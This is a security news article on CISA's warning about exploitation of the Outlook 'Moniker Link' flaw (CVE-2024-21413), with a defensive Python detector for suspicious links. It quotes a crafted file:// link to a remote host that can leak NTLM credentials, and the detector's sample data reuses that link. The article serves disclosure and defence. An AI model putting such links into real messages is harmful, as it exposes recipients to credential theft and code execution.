CISA warns of ongoing attacks exploiting Microsoft Outlook remote code execution (RCE) flaw
Take action: You need to update your Microsoft Outlook and MS Office. Right Now. Or be hacked. There is no debate about this, because hackers don't care that it's a hassle.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical warning regarding ongoing attacks exploiting a remote code execution (RCE) vulnerability in Microsoft Outlook.
The vulnerability is tracked as CVE-2024-21413 (CVSS score 9.8) and stems from improper input validation in Microsoft Outlook when handling emails containing malicious links. What makes this flaw particularly dangerous is its ability to bypass Microsoft's Protected View security feature, which typically protects users by opening potentially harmful files in read-only mode. The Preview Pane itself can serve as an attack vector, meaning users don't even need to open malicious documents to be affected.
The attack methodology, dubbed "Moniker Link," is remarkably straightforward. Attackers can bypass Outlook's built-in protections for malicious links by using the file:// protocol and adding an exclamation mark after the file extension, along with random text. For example, a malicious link might be structured as:
file:///\\10.10.111.111\test\test.rtf!something.
This simple modification allows attackers to potentially steal NTLM credentials and execute arbitrary code through specially crafted Office documents.
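For defenders, the link shape described above can be flagged in inbound HTML mail before it reaches Outlook. The following is an added example, not code from CISA or Microsoft; the function names, the regex generalising the one link shown, and the sample message bodies are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# file: scheme, a first path component (the remote host in a UNC-style link),
# then a path ending in ".<ext>" that is followed by "!" and extra text.
MONIKER_RE = re.compile(
    r"^file:[/\\]+(?P<host>[^/\\!]+)[/\\][^!]*\.[A-Za-z0-9]{1,8}!.*",
    re.IGNORECASE,
)

class _HrefCollector(HTMLParser):
    """Collects every href attribute value found in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)

def find_moniker_links(html_body):
    """Return (href, host) pairs for links matching the Moniker Link shape."""
    collector = _HrefCollector()
    collector.feed(html_body)
    hits = []
    for href in collector.hrefs:
        # Normalise whitespace and percent-encoding before matching.
        match = MONIKER_RE.match(unquote(href.strip()))
        if match:
            hits.append((href, match.group("host")))
    return hits

# Constructed sample bodies; the first reuses the link quoted in the article.
SAMPLE_BODIES = {
    "moniker": r'<p><a href="file:///\\10.10.111.111\test\test.rtf!something">report</a></p>',
    "plain_unc": r'<a href="file:///\\fileserver\share\report.docx">share</a>',
    "web": '<a href="https://example.com/doc.rtf!x">web</a>',
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, find_moniker_links(body))
```

A hit is a reason to quarantine the message and review outbound SMB connections to the reported host; it does not replace installing the Office update.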
The vulnerability affects several Microsoft products, including:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019
CISA has ordered federal agencies to secure their systems against this vulnerability by February 27, 2025. CISA strongly recommends that private organizations also prioritize patching this vulnerability to protect against ongoing attacks.
Update - as of 1st of December 2025, a PoC exploit for this vulnerability has been published.